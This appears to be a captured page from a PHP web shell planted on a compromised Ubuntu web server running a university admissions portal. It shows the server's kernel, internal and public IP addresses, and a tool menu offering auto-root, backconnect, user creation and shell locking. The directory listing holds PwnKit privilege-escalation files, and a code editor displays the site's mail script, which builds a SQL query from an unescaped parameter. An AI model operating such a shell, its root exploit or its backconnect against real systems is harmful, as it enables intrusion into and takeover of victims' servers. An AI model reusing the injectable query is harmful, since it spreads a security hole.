Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.223.136
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
admission /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
PHPExcel
[ DIR ]
drwxrwxr-x
Reports
[ DIR ]
drwxrwxr-x
adm_pdf
[ DIR ]
drwxrwxr-x
admin
[ DIR ]
drwxrwxr-x
api
[ DIR ]
drwxrwxrwx
assets
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
ebbuze
[ DIR ]
drwxrwxr-x
fileformat
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxr-x
harsha
[ DIR ]
drwxrwxr-x
hcon
[ DIR ]
drwxrwxr-x
html_modules
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
phpqrcode-master
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
razorpay
[ DIR ]
drwxrwxr-x
rrit
[ DIR ]
drwxrwxr-x
select2
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
surana
[ DIR ]
drwxrwxr-x
tcpdf
[ DIR ]
drwxrwxr-x
uploades
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxr-x
webhook
[ DIR ]
drwxrwxr-x
.htaccess
77
B
-rwxr-xr-x
.mad-root
0
B
-rw-r--r--
1index.html
40
B
-rw-r--r--
admapplication.php
10.28
KB
-rw-r--r--
app.php
416
B
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
consts.php
227
B
-rwxr-xr-x
dataTable.js
28
B
-rwxr-xr-x
database.php
385
B
-rwxr-xr-x
forgotpwd.html
737
B
-rw-r--r--
index.php
307
B
-rwxr-xr-x
index_demo.html
5.2
KB
-rw-r--r--
index_harsha.html
6.7
KB
-rw-r--r--
index_hcon.html
6.7
KB
-rw-r--r--
index_rrit.html
6.58
KB
-rw-r--r--
index_stop.html
5.17
KB
-rw-r--r--
index_surana.html
5.68
KB
-rw-r--r--
leadLogs.php
789
B
-rwxr-xr-x
lead_format.xlsx
9.25
KB
-rw-r--r--
leaddetmail.php
2.33
KB
-rwxr-xr-x
login.html
2.87
KB
-rwxr-xr-x
login_demo.html
2.92
KB
-rwxr-xr-x
login_harsha.html
4
KB
-rwxr-xr-x
login_hcon.html
4
KB
-rwxr-xr-x
login_rrit.html
3.98
KB
-rwxr-xr-x
login_surana.html
2.96
KB
-rwxr-xr-x
payment_response.php
31
B
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
sendGridMail.php
1.55
KB
-rwxr-xr-x
sendsms.php
600
B
-rw-rw-r--
sendsmsapiv1.php
5.61
KB
-rwxr-xr-x
sendsmsonex.php
594
B
-rw-rw-r--
std_mainpage.html
6.92
KB
-rw-r--r--
verify.php
10.15
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : leaddetmail.php
<?php function leaddetmail($aobj_context,$univcode,$onldate,$fname,$fmobile,$femail,$fdegree,$fadmname,$fadmemail,$flink) { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip_address = $_SERVER['HTTP_CLIENT_IP']; } else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip_address = $_SERVER['REMOTE_ADDR']; } $fsubj = "New Lead Details"; $logo = "https://universitysolutions.in/admission/img/".$univcode."_logo.jpg"; $message="<html>"; $message.="<body>"; $message.="<style>"; $message.=".mail_tbl td{ text-align:left; padding:2px; font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif;"; $message.="</style>"; $message.="<div ><img src='{$logo}' height='100px' width='250px' /></div>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif; text-align:right'>Date.:"." $onldate "."</p>"; $message.="<p style='line-height: 0;'><b>Dear "."$fadmname".",</b><br></p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> You have received a new lead from ".$flink." for ".$fdegree."</p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Lead Source: "."$flink".".</p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Lead Name: "."$fname".".<br></p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Phone Number : "."$fmobile".".<br></p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Email ID: "."$femail".".</p>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'> Best Regards,</p>"; $message.="</body>"; $message.="</html>"; $subject= strtoupper($fsubj); $from = "Admissions@harshaintitutions.com"; $qry10 = "select ifnull(femailkey, '')as femailkey, ifnull(FSUPEMAIL, '')as FSUPEMAIL from logisys3_comexam.dbname where funivcode='{$univcode}'"; $res10 = $aobj_context->pobj_db->GetRow($qry10); $resp = sendZohoMail($fadmemail, $subject, $message, $res10['femailkey'], $res10['FSUPEMAIL']); return ; } ?>
Close